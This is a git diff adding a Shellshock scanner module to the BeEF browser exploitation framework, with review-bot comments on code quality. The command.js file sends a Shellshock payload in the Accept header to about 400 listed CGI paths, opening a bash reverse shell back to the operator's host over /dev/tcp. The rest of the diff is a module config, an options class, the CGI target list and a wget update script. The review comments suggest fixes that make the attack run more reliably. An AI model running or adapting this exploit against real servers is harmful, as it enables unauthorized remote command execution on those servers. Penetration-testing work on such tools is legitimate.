diff --git a/modules/exploits/shell_shock_scanner/command.js b/modules/exploits/shell_shock_scanner/command.js
new file mode 100644
index 000000000..98d768ae8
--- /dev/null
+++ b/modules/exploits/shell_shock_scanner/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rproto = '<%= @rproto %>';
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+ var target = rproto + '://' + rhost + ':' + rport;
+ var method = '<%= @method %>';
+ var wait = '<%= @wait %>';
+ var timeout = '<%= @timeout %>';
+
+ get_cgi = function(uri) {
+ try {
+ var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+ var xhr = new XMLHttpRequest();
+ xhr.open(method, target+uri, true);
+ xhr.onload = function () {
+ };
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState == 4 && xhr.status == 200) {
+ beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+ }
+ }
+ xhr.setRequestHeader("Accept", payload);
+ xhr.send(null);
+ } catch (e){
+ beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+ }
+ }
+
+ var scripts = new Array(
+<%=
+ scripts = []
+ File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+ file_handle.each_line do |line|
+ uri = line.chomp!
+ next if uri =~ /^#/
+ next if uri.nil?
+ scripts << "'#{uri}'"
+ end
+ end
+ scripts.shuffle.join(",\n")
+%>
+);
+
+ // add scripts to queue
+ var requests = [];
+ for (var i=0; i", <%= @command_id %>, "result=starting scan");
+ var handle = setInterval(function() {
+ if (requests.length > 0) {
+ get_cgi(requests.pop());
+ } else cleanup();
+ }, wait*1000);
+
+ // clean up
+ cleanup = function() {
+ if (handle) {
+ beef.debug("Killing timer [ID: " + handle + "]");
+ clearInterval(handle);
+ handle = 0;
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+ }
+ }
+ setTimeout("cleanup();", timeout*1000);
+
+});
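Review bot: `setTimeout("cleanup();", timeout*1000);` near the end of the hunk passes a string, which the browser evaluates like `eval` and resolves through the page's global scope; `setTimeout(cleanup, Number(timeout) * 1000);` removes the string evaluation. `get_cgi` and `cleanup` are assigned without `var`, so they become globals of the hooked document and can collide with other command modules executing in the same page; declaring them with `var` inside the `beef.execute` callback keeps them local. `wait` and `timeout` are emitted as quoted strings by the template and only work in `wait*1000` through implicit coercion, so convert them once, e.g. `var wait = Number('<%= @wait %>');`. Option values are also interpolated into JavaScript string literals as `'<%= @rhost %>'` without escaping, so a quote in an operator-supplied value produces a syntax error in the generated script; serialising them with `to_json` in the template would be safer. The `for (var i=0; ...` line is truncated in this rendering, so the queue-building loop itself could not be reviewed.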
diff --git a/modules/exploits/shell_shock_scanner/config.yaml b/modules/exploits/shell_shock_scanner/config.yaml
new file mode 100644
index 000000000..be4b5fc61
--- /dev/null
+++ b/modules/exploits/shell_shock_scanner/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ shell_shock_scanner:
+ enable: true
+ category: "Exploits"
+ name: "Shell Shock Scanner (Reverse Shell)"
+ description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker."
+ authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/shell_shock_scanner/module.rb b/modules/exploits/shell_shock_scanner/module.rb
new file mode 100644
index 000000000..3e084d3a1
--- /dev/null
+++ b/modules/exploits/shell_shock_scanner/module.rb
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shock_scanner < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
+ { 'name' => 'rproto',
+ 'type' => 'combobox',
+ 'ui_label' => 'Target Protocol',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['rproto'],
+ 'store_data' => [
+ ['http'],
+ ['https']
+ ],
+ 'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+ 'valueField' => 'rproto',
+ 'displayField' => 'rproto',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
+ { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
+ { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/shell_shock_scanner/shocker-cgi_list b/modules/exploits/shell_shock_scanner/shocker-cgi_list
new file mode 100644
index 000000000..abc0127eb
--- /dev/null
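Review bot: `return [` in `self.options` is redundant Ruby, since a method's value is its last expression; dropping `return` matches the style of `post_execute` in the same hunk. The numeric options (`rport`, `lport`, `wait`, `timeout`) are free-text fields whose values reach the client template unvalidated, and the template multiplies `wait` and `timeout` as strings, so a non-numeric value produces `NaN` and a timer interval of effectively zero in the browser. Checking that these values are numeric server-side, before the template is rendered, would surface the mistake in the UI rather than in the hooked page.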
+++ b/modules/exploits/shell_shock_scanner/shocker-cgi_list 
@@ -0,0 +1,410 @@ +# Resource file for shocker.py +# List of pages/scripts potentially vulnerable to Shellshock +# One per line, no commas, spaces, tabs, etc. +# Credits to the following from whence many were borrowed: +# https://github.com/mubix/shellshocker-pocs/blob/master/shell_sprayer.py +# http://patrickpierson.us/wp-content/uploads/2014/09/shellshock.txt +# http://khalil-shreateh.com/khalil.shtml/index.php/websites/websites-security/201-ais-shellshock-scanning-tool-that-leverages-the-user-agent-header-against-a-large-list-of-possible-targets-written-in-c.html?showall=1 +# http://www.linuxfeed.org/2014/10/advanced-information-security-shellshock-scanner/ +# https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py +# http://shellshock.detectify.com +/ +/admin.cgi +/administrator.cgi +/agora.cgi +/aktivate/cgi-bin/catgy.cgi +/analyse.cgi +/apps/web/vs_diag.cgi +/axis-cgi/buffer/command.cgi +/b2-include/b2edit.showposts.php +/bandwidth/index.cgi +/bigconf.cgi +/cartcart.cgi +/cart.cgi +/ccbill/whereami.cgi +/cgi-bin/14all-1.1.cgi +/cgi-bin/14all.cgi +/cgi-bin/a1disp3.cgi +/cgi-bin/a1stats/a1disp3.cgi +/cgi-bin/a1stats/a1disp4.cgi +/cgi-bin/addbanner.cgi +/cgi-bin/add_ftp.cgi +/cgi-bin/adduser.cgi +/cgi-bin/admin/admin.cgi +/cgi-bin/admin.cgi +/cgi-bin/admin/getparam.cgi +/cgi-bin/adminhot.cgi +/cgi-bin/admin.pl +/cgi-bin/admin/setup.cgi +/cgi-bin/adminwww.cgi +/cgi-bin/af.cgi +/cgi-bin/aglimpse.cgi +/cgi-bin/alienform.cgi +/cgi-bin/AnyBoard.cgi +/cgi-bin/architext_query.cgi +/cgi-bin/astrocam.cgi +/cgi-bin/AT-admin.cgi +/cgi-bin/AT-generate.cgi +/cgi-bin/auction/auction.cgi +/cgi-bin/auktion.cgi +/cgi-bin/ax-admin.cgi +/cgi-bin/ax.cgi +/cgi-bin/axs.cgi +/cgi-bin/badmin.cgi +/cgi-bin/banner.cgi +/cgi-bin/bannereditor.cgi +/cgi-bin/bb-ack.sh +/cgi-bin/bb-histlog.sh +/cgi-bin/bb-hist.sh +/cgi-bin/bb-hostsvc.sh +/cgi-bin/bb-replog.sh +/cgi-bin/bb-rep.sh +/cgi-bin/bbs_forum.cgi +/cgi-bin/bigconf.cgi +/cgi-bin/bizdb1-search.cgi 
+/cgi-bin/blog/mt-check.cgi +/cgi-bin/blog/mt-load.cgi +/cgi-bin/bnbform.cgi +/cgi-bin/book.cgi +/cgi-bin/boozt/admin/index.cgi +/cgi-bin/bsguest.cgi +/cgi-bin/bslist.cgi +/cgi-bin/build.cgi +/cgi-bin/bulk/bulk.cgi +/cgi-bin/cached_feed.cgi +/cgi-bin/cachemgr.cgi +/cgi-bin/calendar/index.cgi +/cgi-bin/cartmanager.cgi +/cgi-bin/cbmc/forums.cgi +/cgi-bin/ccvsblame.cgi +/cgi-bin/c_download.cgi +/cgi-bin/cgforum.cgi +/cgi-bin/.cgi +/cgi-bin/cgi_process +/cgi-bin/classified.cgi +/cgi-bin/classifieds.cgi +/cgi-bin/classifieds/classifieds.cgi +/cgi-bin/classifieds/index.cgi +/cgi-bin/.cobalt/alert/service.cgi +/cgi-bin/.cobalt/message/message.cgi +/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi +/cgi-bin/commandit.cgi +/cgi-bin/commerce.cgi +/cgi-bin/common/listrec.pl +/cgi-bin/compatible.cgi +/cgi-bin/Count.cgi +/cgi-bin/csChatRBox.cgi +/cgi-bin/csGuestBook.cgi +/cgi-bin/csLiveSupport.cgi +/cgi-bin/CSMailto.cgi +/cgi-bin/CSMailto/CSMailto.cgi +/cgi-bin/csNews.cgi +/cgi-bin/csNewsPro.cgi +/cgi-bin/csPassword.cgi +/cgi-bin/csPassword/csPassword.cgi +/cgi-bin/csSearch.cgi +/cgi-bin/csv_db.cgi +/cgi-bin/cvsblame.cgi +/cgi-bin/cvslog.cgi +/cgi-bin/cvsquery.cgi +/cgi-bin/cvsqueryform.cgi +/cgi-bin/day5datacopier.cgi +/cgi-bin/day5datanotifier.cgi +/cgi-bin/db_manager.cgi +/cgi-bin/dbman/db.cgi +/cgi-bin/dcforum.cgi +/cgi-bin/dcshop.cgi +/cgi-bin/dfire.cgi +/cgi-bin/diagnose.cgi +/cgi-bin/dig.cgi +/cgi-bin/directorypro.cgi +/cgi-bin/download.cgi +/cgi-bin/e87_Ba79yo87.cgi +/cgi-bin/emu/html/emumail.cgi +/cgi-bin/emumail.cgi +/cgi-bin/emumail/emumail.cgi +/cgi-bin/enter.cgi +/cgi-bin/environ.cgi +/cgi-bin/ezadmin.cgi +/cgi-bin/ezboard.cgi +/cgi-bin/ezman.cgi +/cgi-bin/ezshopper2/loadpage.cgi +/cgi-bin/ezshopper3/loadpage.cgi +/cgi-bin/ezshopper/loadpage.cgi +/cgi-bin/ezshopper/search.cgi +/cgi-bin/faqmanager.cgi +/cgi-bin/FileSeek2.cgi +/cgi-bin/FileSeek.cgi +/cgi-bin/finger.cgi +/cgi-bin/flexform.cgi +/cgi-bin/fom.cgi +/cgi-bin/fom/fom.cgi +/cgi-bin/FormHandler.cgi 
+/cgi-bin/FormMail.cgi +/cgi-bin/gbadmin.cgi +/cgi-bin/gbook/gbook.cgi +/cgi-bin/generate.cgi +/cgi-bin/getdoc.cgi +/cgi-bin/gH.cgi +/cgi-bin/gm-authors.cgi +/cgi-bin/gm.cgi +/cgi-bin/gm-cplog.cgi +/cgi-bin/guestbook.cgi +/cgi-bin/handler +/cgi-bin/handler.cgi +/cgi-bin/handler/netsonar +/cgi-bin/hitview.cgi +/cgi-bin/hsx.cgi +/cgi-bin/html2chtml.cgi +/cgi-bin/html2wml.cgi +/cgi-bin/htsearch.cgi +/cgi-bin/icat +/cgi-bin/if/admin/nph-build.cgi +/cgi-bin/ikonboard/help.cgi +/cgi-bin/ImageFolio/admin/admin.cgi +/cgi-bin/imageFolio.cgi +/cgi-bin/index.cgi +/cgi-bin/infosrch.cgi +/cgi-bin/jammail.pl +/cgi-bin/journal.cgi +/cgi-bin/lastlines.cgi +/cgi-bin/loadpage.cgi +/cgi-bin/login.cgi +/cgi-bin/logit.cgi +/cgi-bin/log-reader.cgi +/cgi-bin/lookwho.cgi +/cgi-bin/lwgate.cgi +/cgi-bin/MachineInfo +/cgi-bin/MachineInfo +/cgi-bin/magiccard.cgi +/cgi-bin/mail/emumail.cgi +/cgi-bin/maillist.cgi +/cgi-bin/mailnews.cgi +/cgi-bin/mail/nph-mr.cgi +/cgi-bin/main.cgi +/cgi-bin/main_menu.pl +/cgi-bin/man.sh +/cgi-bin/mini_logger.cgi +/cgi-bin/mmstdod.cgi +/cgi-bin/moin.cgi +/cgi-bin/mojo/mojo.cgi +/cgi-bin/mrtg.cgi +/cgi-bin/mt.cgi +/cgi-bin/mt/mt.cgi +/cgi-bin/mt/mt-check.cgi +/cgi-bin/mt/mt-load.cgi +/cgi-bin/mt-static/mt-check.cgi +/cgi-bin/mt-static/mt-load.cgi +/cgi-bin/musicqueue.cgi +/cgi-bin/myguestbook.cgi +/cgi-bin/.namazu.cgi +/cgi-bin/nbmember.cgi +/cgi-bin/netauth.cgi +/cgi-bin/netpad.cgi +/cgi-bin/newsdesk.cgi +/cgi-bin/nlog-smb.cgi +/cgi-bin/nph-emumail.cgi +/cgi-bin/nph-exploitscanget.cgi +/cgi-bin/nph-publish.cgi +/cgi-bin/nph-test.cgi +/cgi-bin/pagelog.cgi +/cgi-bin/pbcgi.cgi +/cgi-bin/perlshop.cgi +/cgi-bin/pfdispaly.cgi +/cgi-bin/pfdisplay.cgi +/cgi-bin/phf.cgi +/cgi-bin/photo/manage.cgi +/cgi-bin/photo/protected/manage.cgi +/cgi-bin/php-cgi +/cgi-bin/php.cgi +/cgi-bin/php.fcgi +/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi +/cgi-bin/pollssi.cgi +/cgi-bin/postcards.cgi +/cgi-bin/powerup/r.cgi +/cgi-bin/printenv +/cgi-bin/probecontrol.cgi +/cgi-bin/profile.cgi 
+/cgi-bin/publisher/search.cgi +/cgi-bin/quickstore.cgi +/cgi-bin/quizme.cgi +/cgi-bin/ratlog.cgi +/cgi-bin/r.cgi +/cgi-bin/register.cgi +/cgi-bin/replicator/webpage.cgi/ +/cgi-bin/responder.cgi +/cgi-bin/robadmin.cgi +/cgi-bin/robpoll.cgi +/cgi-bin/rtpd.cgi +/cgi-bin/sbcgi/sitebuilder.cgi +/cgi-bin/scoadminreg.cgi +/cgi-bin-sdb/printenv +/cgi-bin/sdbsearch.cgi +/cgi-bin/search +/cgi-bin/search.cgi +/cgi-bin/search/search.cgi +/cgi-bin/sendform.cgi +/cgi-bin/shop.cgi +/cgi-bin/shopper.cgi +/cgi-bin/shopplus.cgi +/cgi-bin/showcheckins.cgi +/cgi-bin/simplestguest.cgi +/cgi-bin/simplestmail.cgi +/cgi-bin/smartsearch.cgi +/cgi-bin/smartsearch/smartsearch.cgi +/cgi-bin/snorkerz.bat +/cgi-bin/snorkerz.bat +/cgi-bin/snorkerz.cmd +/cgi-bin/snorkerz.cmd +/cgi-bin/sojourn.cgi +/cgi-bin/spin_client.cgi +/cgi-bin/start.cgi +/cgi-bin/status +/cgi-bin/status_cgi +/cgi-bin/store/agora.cgi +/cgi-bin/store.cgi +/cgi-bin/store/index.cgi +/cgi-bin/survey.cgi +/cgi-bin/sync.cgi +/cgi-bin/talkback.cgi +/cgi-bin/technote/main.cgi +/cgi-bin/test2.pl +/cgi-bin/test-cgi +/cgi-bin/test.cgi +/cgi-bin/testing_whatever +/cgi-bin/test/test.cgi +/cgi-bin/tidfinder.cgi +/cgi-bin/tigvote.cgi +/cgi-bin/title.cgi +/cgi-bin/top.cgi +/cgi-bin/traffic.cgi +/cgi-bin/troops.cgi +/cgi-bin/ttawebtop.cgi/ +/cgi-bin/ultraboard.cgi +/cgi-bin/upload.cgi +/cgi-bin/urlcount.cgi +/cgi-bin/viewcvs.cgi +/cgi-bin/view_help.cgi +/cgi-bin/viralator.cgi +/cgi-bin/virgil.cgi +/cgi-bin/vote.cgi +/cgi-bin/vpasswd.cgi +/cgi-bin/way-board.cgi +/cgi-bin/way-board/way-board.cgi +/cgi-bin/webbbs.cgi +/cgi-bin/webcart/webcart.cgi +/cgi-bin/webdist.cgi +/cgi-bin/webif.cgi +/cgi-bin/webmail/html/emumail.cgi +/cgi-bin/webmap.cgi +/cgi-bin/webspirs.cgi +/cgi-bin/Web_Store/web_store.cgi +/cgi-bin/whois.cgi +/cgi-bin/whois_raw.cgi +/cgi-bin/whois/whois.cgi +/cgi-bin/wrap +/cgi-bin/wrap.cgi +/cgi-bin/wwwboard.cgi.cgi +/cgi-bin/YaBB/YaBB.cgi +/cgi-bin/zml.cgi +/cgi-mod/index.cgi +/cgis/wwwboard/wwwboard.cgi +/cgi-sys/addalink.cgi 
+/cgi-sys/defaultwebpage.cgi +/cgi-sys/domainredirect.cgi +/cgi-sys/entropybanner.cgi +/cgi-sys/entropysearch.cgi +/cgi-sys/FormMail-clone.cgi +/cgi-sys/helpdesk.cgi +/cgi-sys/mchat.cgi +/cgi-sys/randhtml.cgi +/cgi-sys/realhelpdesk.cgi +/cgi-sys/realsignup.cgi +/cgi-sys/signup.cgi +/connector.cgi +/cp/rac/nsManager.cgi +/create_release.sh +/CSNews.cgi +/csPassword.cgi +/dcadmin.cgi +/dcboard.cgi +/dcforum.cgi +/dcforum/dcforum.cgi +/debuff.cgi +/debug.cgi +/details.cgi +/edittag/edittag.cgi +/emumail.cgi +/enter_buff.cgi +/enter_bug.cgi +/ez2000/ezadmin.cgi +/ez2000/ezboard.cgi +/ez2000/ezman.cgi +/fcgi-bin/echo +/fcgi-bin/echo +/fcgi-bin/echo2 +/fcgi-bin/echo2 +/Gozila.cgi +/hitmatic/analyse.cgi +/hp_docs/cgi-bin/index.cgi +/html/cgi-bin/cgicso +/html/cgi-bin/cgicso +/index.cgi +/info.cgi +/infosrch.cgi +/login.cgi +/mailview.cgi +/main.cgi +/megabook/admin.cgi +/ministats/admin.cgi +/mods/apage/apage.cgi +/_mt/mt.cgi +/musicqueue.cgi +/ncbook.cgi +/newpro.cgi +/newsletter.sh +/oem_webstage/cgi-bin/oemapp_cgi +/page.cgi +/parse_xml.cgi +/photodata/manage.cgi +/photo/manage.cgi +/print.cgi +/process_buff.cgi +/process_bug.cgi +/pub/english.cgi +/quikmail/nph-emumail.cgi +/quikstore.cgi +/reviews/newpro.cgi +/ROADS/cgi-bin/search.pl +/sample01.cgi +/sample02.cgi +/sample03.cgi +/sample04.cgi +/sampleposteddata.cgi +/scancfg.cgi +/scancfg.cgi +/servers/link.cgi +/setpasswd.cgi +/SetSecurity.shm +/shop/member_html.cgi +/shop/normal_html.cgi +/site_searcher.cgi +/siteUserMod.cgi +/submit.cgi +/technote/print.cgi +/template.cgi +/test.cgi +/upload.cgi +/userreg.cgi +/users/scripts/submit.cgi +/vood/cgi-bin/vood_view.cgi +/Web_Store/web_store.cgi +/webtools/bonsai/ccvsblame.cgi +/webtools/bonsai/cvsblame.cgi +/webtools/bonsai/cvslog.cgi +/webtools/bonsai/cvsquery.cgi +/webtools/bonsai/cvsqueryform.cgi +/webtools/bonsai/showcheckins.cgi +/wwwadmin.cgi +/wwwboard.cgi +/wwwboard/wwwboard.cgi 
diff --git a/modules/exploits/shell_shock_scanner/update-list b/modules/exploits/shell_shock_scanner/update-list
new file mode 100755
index 000000000..207c1723b
--- /dev/null
+++ b/modules/exploits/shell_shock_scanner/update-list
@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "[*] Deleting old shocker-cgi_list..."
+rm shocker-cgi_list
+echo "[*] Downloading latest shocker-cgi_list..."
+wget "https://raw.githubusercontent.com/nccgroup/shocker/master/shocker-cgi_list"
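Review bot: `rm shocker-cgi_list` runs before the download is known to have succeeded, so a failed `wget` leaves the module with no CGI list at all; download to a temporary name and replace only on success, `wget -O shocker-cgi_list.new "https://raw.githubusercontent.com/nccgroup/shocker/master/shocker-cgi_list" && mv shocker-cgi_list.new shocker-cgi_list`. Both commands use paths relative to the caller's working directory rather than the script's own location, so running it from elsewhere deletes and writes files in the wrong place; `cd "$(dirname "$0")" || exit 1` at the top pins it. The script also has no `set -e`, and it pulls from a moving `master` branch with no integrity check, so whatever that branch serves is used as-is by the module on its next run.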